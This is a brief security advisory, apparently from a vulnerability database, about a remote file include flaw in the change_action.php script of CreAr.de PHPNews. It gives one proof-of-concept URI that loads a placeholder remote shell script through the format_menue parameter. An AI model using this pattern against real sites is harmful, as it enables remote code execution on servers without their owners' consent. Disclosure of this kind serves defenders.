CreAr.de PHPNews Change_Action.PHP Remote File Include Vulnerability

CreAr.de PHPNews Change_Action.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/path/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]